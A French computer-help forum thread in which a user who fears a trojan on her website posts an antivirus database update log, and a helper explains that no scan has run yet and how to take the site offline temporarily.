File download: bases/five/avc/ext082c.avc
File download: bases/five/avc/ext083c.avc
File download: bases/five/avc/ext084c.avc
File download: bases/five/avc/ext085c.avc
File download: bases/five/avc/ext086c.avc
File download: bases/five/avc/ext087c.avc
File download: bases/five/avc/ext088c.avc
File download: bases/five/avc/ext089c.avc
File download: bases/five/avc/ext090c.avc
File download: bases/five/avc/ext091c.avc
File download: bases/five/avc/ext092c.avc
File download: bases/five/avc/ext093c.avc
File download: bases/five/avc/ext094c.avc
File download: bases/five/avc/ext095c.avc
File download: bases/five/avc/ext096c.avc
File download: bases/five/avc/ext097c.avc
File download: bases/five/avc/ext098c.avc
File download: bases/five/avc/ext099c.avc
File download: bases/five/avc/ext100c.avc
File download: bases/five/avc/ext101c.avc
File download: bases/five/avc/ext102c.avc
File download: bases/five/avc/ext103c.avc
File download: bases/five/avc/ext104c.avc
File download: bases/five/avc/ext105c.avc
File download: bases/five/avc/ext106c.avc
File download: bases/five/avc/ext107c.avc
File download: bases/five/avc/ext108c.avc
File download: bases/five/avc/ext109c.avc
File download: bases/five/avc/ext110c.avc
File download: bases/five/avc/ext111c.avc
File download: bases/five/avc/ext112c.avc
File download: bases/five/avc/ext113c.avc
File download: bases/five/avc/ext114c.avc
File download: bases/five/avc/ext115c.avc
File download: bases/five/avc/ext116c.avc
File download: bases/five/avc/ext117c.avc
File download: bases/five/avc/ext118c.avc
File download: bases/five/avc/ext119c.avc
File download: bases/five/avc/ext120c.avc
File download: bases/five/avc/ext121c.avc
File download: bases/five/avc/ext122c.avc
File download: bases/five/avc/ext123c.avc
File download: bases/five/avc/ext124c.avc
File download: bases/five/avc/ext125c.avc
File download: bases/five/avc/ext126c.avc
File download: bases/five/avc/ext127c.avc
File download: bases/five/avc/ext128c.avc
File download: bases/five/avc/ext129c.avc
File download: bases/five/avc/ext130c.avc
File download: bases/five/avc/ext131c.avc
File download: bases/five/avc/ext132c.avc
File download: bases/five/avc/ext133c.avc
File download: bases/five/avc/ext134c.avc
File download: bases/five/avc/ext135c.avc
File download: bases/five/avc/ext136c.avc
File download: bases/five/avc/ext137c.avc
File download: bases/five/avc/ext138c.avc
File download: bases/five/avc/daily-ec.avc
File download: bases/five/avc/base001.avc
File download: bases/five/avc/base002.avc
File download: bases/five/avc/base003.avc
File download: bases/five/avc/base004.avc
File download: bases/five/avc/base005.avc
File download: bases/five/avc/base006.avc
File download: bases/five/avc/base007.avc
File download: bases/five/avc/base008.avc
File download: bases/five/avc/base009.avc
File download: bases/five/avc/base010.avc
File download: bases/five/avc/base011.avc
File download: bases/five/avc/base012.avc
File download: bases/five/avc/base013.avc
File download: bases/five/avc/base014.avc
File download: bases/five/avc/base015.avc
File download: bases/five/avc/base016.avc
File download: bases/five/avc/base017.avc
File download: bases/five/avc/base018.avc
File download: bases/five/avc/base019.avc
File download: bases/five/avc/base020.avc
File download: bases/five/avc/base021.avc
File download: bases/five/avc/base022.avc
File download: bases/five/avc/base023.avc
File download: bases/five/avc/base024.avc
File download: bases/five/avc/base025.avc
File download: bases/five/avc/base026.avc
File download: bases/five/avc/base027.avc
File download: bases/five/avc/base028.avc
File download: bases/five/avc/base029.avc
File download: bases/five/avc/base030.avc
File download: bases/five/avc/base031.avc
File download: bases/five/avc/base032.avc
File download: bases/five/avc/base033.avc
File download: bases/five/avc/base034.avc
File download: bases/five/avc/base035.avc
File download: bases/five/avc/base036.avc
File download: bases/five/avc/base037.avc
File download: bases/five/avc/base038.avc
File download: bases/five/avc/base039.avc
File download: bases/five/avc/base040.avc
File download: bases/five/avc/base041.avc
File download: bases/five/avc/base042.avc
File download: bases/five/avc/base043.avc
File download: bases/five/avc/base044.avc
File download: bases/five/avc/base045.avc
File download: bases/five/avc/base046.avc
File download: bases/five/avc/base047.avc
File download: bases/five/avc/base048.avc
File download: bases/five/avc/base049.avc
File download: bases/five/avc/base050.avc
File download: bases/five/avc/base051.avc
File download: bases/five/avc/base052.avc
File download: bases/five/avc/base053.avc
File download: bases/five/avc/base054.avc
File download: bases/five/avc/base055.avc
File download: bases/five/avc/base056.avc
File download: bases/five/avc/base057.avc
File download: bases/five/avc/base058.avc
File download: bases/five/avc/base059.avc
File download: bases/five/avc/base060.avc
File download: bases/five/avc/base061.avc
File download: bases/five/avc/base062.avc
File download: bases/five/avc/base063.avc
File download: bases/five/avc/base064.avc
File download: bases/five/avc/base065.avc
File download: bases/five/avc/base066.avc
File download: bases/five/avc/base067.avc
File download: bases/five/avc/base068.avc
File download: bases/five/avc/base069.avc
File download: bases/five/avc/base070.avc
File download: bases/five/avc/base071.avc
File download: bases/five/avc/base072.avc
File download: bases/five/avc/base073.avc
File download: bases/five/avc/base074.avc
File download: bases/five/avc/base075.avc
File download: bases/five/avc/base076.avc
File download: bases/five/avc/base077.avc
File download: bases/five/avc/base078.avc
File download: bases/five/avc/base079.avc
File download: bases/five/avc/base080.avc
File download: bases/five/avc/base081.avc
File download: bases/five/avc/base082.avc
File download: bases/five/avc/base083.avc
File download: bases/five/avc/base084.avc
File download: bases/five/avc/base085.avc
File download: bases/five/avc/base086.avc
File download: bases/five/avc/base087.avc
File download: bases/five/avc/base088.avc
File download: bases/five/avc/base089.avc
File download: bases/five/avc/base090.avc
File download: bases/five/avc/base091.avc
File download: bases/five/avc/base092.avc
File download: bases/five/avc/base093.avc
File download: bases/five/avc/base094.avc
File download: bases/five/avc/base095.avc
File download: bases/five/avc/base096.avc
File download: bases/five/avc/base097.avc
File download: bases/five/avc/base098.avc
File download: bases/five/avc/base099.avc
File download: bases/five/avc/base100.avc
File download: bases/five/avc/base101.avc
File download: bases/five/avc/base102.avc
File download: bases/five/avc/base103.avc
File download: bases/five/avc/base104.avc
File download: bases/five/avc/base105.avc
File download: bases/five/avc/base106.avc
File download: bases/five/avc/base107.avc
File download: bases/five/avc/base108.avc
File download: bases/five/avc/base109.avc
File download: bases/five/avc/base110.avc
File download: bases/five/avc/base111.avc
File download: bases/five/avc/base112.avc
File download: bases/five/avc/base113.avc
File download: bases/five/avc/base114.avc
File download: bases/five/avc/base115.avc
File download: bases/five/avc/base116.avc
File download: bases/five/avc/base117.avc
File download: bases/five/avc/base118.avc
File download: bases/five/avc/base119.avc
File download: bases/five/avc/base120.avc
File download: bases/five/avc/base121.avc
File download: bases/five/avc/base122.avc
File download: bases/five/avc/base123.avc
File download: bases/five/avc/base124.avc
File download: bases/five/avc/base125.avc
File download: bases/five/avc/base126.avc
File download: bases/five/avc/base127.avc
File download: bases/five/avc/base128.avc
File download: bases/five/avc/base129.avc
File download: bases/five/avc/base130.avc
File download: bases/five/avc/base131.avc
File download: bases/five/avc/base132.avc
File download: bases/five/avc/base133.avc
File download: bases/five/avc/base134.avc
File download: bases/five/avc/base135.avc
File download: bases/five/avc/base136.avc
File download: bases/five/avc/base137.avc
File download: bases/five/avc/base138.avc
File download: bases/five/avc/base139.avc
File download: bases/five/avc/base140.avc
File download: bases/five/avc/base141.avc
File download: bases/five/avc/base142.avc
File download: bases/five/avc/base143.avc
File download: bases/five/avc/base144.avc
File download: bases/five/avc/base145.avc
File download: bases/five/avc/base146.avc
File download: bases/five/avc/base147.avc
File download: bases/five/avc/base148.avc
File download: bases/five/avc/base149.avc
File download: bases/five/avc/base150.avc
File download: bases/five/avc/base151.avc
File download: bases/five/avc/base152.avc
File download: bases/five/avc/base153.avc
File download: bases/five/avc/base154.avc
File download: bases/five/avc/base155.avc
File download: bases/five/avc/base156.avc
File download: bases/five/avc/base157.avc
File download: bases/five/avc/base158.avc
File download: bases/five/avc/base159.avc
File download: bases/five/avc/base160.avc
File download: bases/five/avc/base161.avc
File download: bases/five/avc/base162.avc
File download: bases/five/avc/base163.avc
File download: bases/five/avc/base164.avc
File download: bases/five/avc/base165.avc
File download: bases/five/avc/base166.avc
File download: bases/five/avc/base167.avc
File download: bases/five/avc/base168.avc
File download: bases/five/avc/base169.avc
File download: bases/five/avc/base170.avc
File download: bases/five/avc/base171.avc
File download: bases/five/avc/base999.avc
File download: bases/five/avc/unp000.avc
File download: bases/five/avc/unp001.avc
File download: bases/five/avc/unp002.avc
File download: bases/five/avc/unp003.avc
File download: bases/five/avc/unp004.avc
File download: bases/five/avc/unp005.avc
File download: bases/five/avc/unp006.avc
File download: bases/five/avc/unp007.avc
File download: bases/five/avc/unp008.avc
File download: bases/five/avc/unp009.avc
File download: bases/five/avc/unp010.avc
File download: bases/five/avc/unp011.avc
File download: bases/five/avc/unp012.avc
File download: bases/five/avc/unp013.avc
File download: bases/five/avc/unp014.avc
File download: bases/five/avc/unp015.avc
File download: bases/five/avc/unp016.avc
File download: bases/five/avc/unp017.avc
File download: bases/five/avc/unp018.avc
File download: bases/five/avc/unp019.avc
File download: bases/five/avc/unp020.avc
File download: bases/five/avc/unp021.avc
File download: bases/five/avc/unp022.avc
File download: bases/five/avc/unp023.avc
File download: bases/five/avc/unp024.avc
File download: bases/five/avc/unp025.avc
File download: bases/five/avc/unp026.avc
File download: bases/five/avc/unp027.avc
File download: bases/five/avc/unp028.avc
File download: bases/five/avc/unp029.avc
File download: bases/five/avc/unp030.avc
File download: bases/five/avc/unp031.avc
File download: bases/five/avc/unp032.avc
File download: bases/five/avc/unp033.avc
File download: bases/five/avc/unp034.avc
File download: bases/five/avc/unp035.avc
File download: bases/five/avc/unp036.avc
File download: bases/five/avc/unp037.avc
File download: bases/five/avc/unp038.avc
File download: bases/five/avc/unp039.avc
File download: bases/five/avc/unp040.avc
File download: bases/five/avc/unp041.avc
File download: bases/five/avc/unp042.avc
File download: bases/five/avc/unp043.avc
File download: bases/five/avc/unp044.avc
File download: bases/five/avc/unp045.avc
File download: bases/five/avc/unp999.avc
File download: bases/five/avc/daily.avc
File download: bases/five/avc/daily-ex.avc
File download: bases/five/avc/mail.avc
File download: bases/five/avc/ext001.avc
File download: bases/five/avc/ext002.avc
File download: bases/five/avc/ext003.avc
File download: bases/five/avc/ext004.avc
File download: bases/five/avc/ext005.avc
File download: bases/five/avc/ext006.avc
File download: bases/five/avc/ext007.avc
File download: bases/five/avc/ext008.avc
File download: bases/five/avc/ext009.avc
File download: bases/five/avc/ext999.avc
File download: bases/five/avc/gen001.avc
File download: bases/five/avc/gen002.avc
File download: bases/five/avc/gen003.avc
File download: bases/five/avc/gen004.avc
File download: bases/five/avc/gen005.avc
File download: bases/five/avc/gen006.avc
File download: bases/five/avc/gen999.avc
File download: bases/five/avc/ca001.avc
File download: bases/five/avc/ca002.avc
File download: bases/five/avc/ca003.avc
File download: bases/five/avc/fa.avc
File download: bases/five/avc/eicar.avc
File download: bases/five/avc/verdicts.ini
File download: bases/five/avc/engine.dt
File download: bases/five/avc/engine.cfg
File download: bases/five/avc/avcmhk5.mhk
File download: bases/five/avc/avp.set
File download: bases/five/avc/avp_ext.set
File download: bases/five/avc/avp_x.set
File download: bases/five/avc/avp.vnd
File download: bases/five/avc/avp.klb
Update completed. The program is ready to scan your computer. |
|
Posté le 21/02/2010 à 19:56 |
Petite astucienne
| Bonsoir,
Est-ce ce rapport dont il s'agit ? j'ai redémarré le pc après le scan.
A+ |
|
Posté le 21/02/2010 à 20:34 |
Petite astucienne
| RE
En attendant la résolution du problème, pourrais-tu m'indiquer comment désactiver temporairement mon site. Je redoute d'infecter les visiteurs car nous sommes en pleine période de réservation, beaucoup de trafic, et ça je préfère éviter.
merci encore.
|
|
Posté le 21/02/2010 à 20:52 |
Petite astucienne
| |
|
Posté le 21/02/2010 à 22:31 |
Grande Maîtresse astucienne |
non pas du tout, là il s'agit du chargement de la base de données, ensuite il faut faire le scan en ligne.
Pour désactiver ton site, retire tout simplement la page princpale du serveur. |
|
Posté le 21/02/2010 à 22:32 |
Grande Maîtresse astucienne | en fait il est écrit :
The program is ready to scan your computer.
c'est à dire que le programme est prêt pour scanner l'ordi, si tu l'as redémarré, il ne l'a donc pas scanné, tu dois tout reprendre.
|
|
|
|
|
|
cheval de troie
À LA UNE
PRATIQUE
LOGITHÈQUE
TABLETTE ET MOBILE
BONS PLANS
FONDS D'ÉCRAN
JEUX
FORUM
Bonsoir et bienvenue,
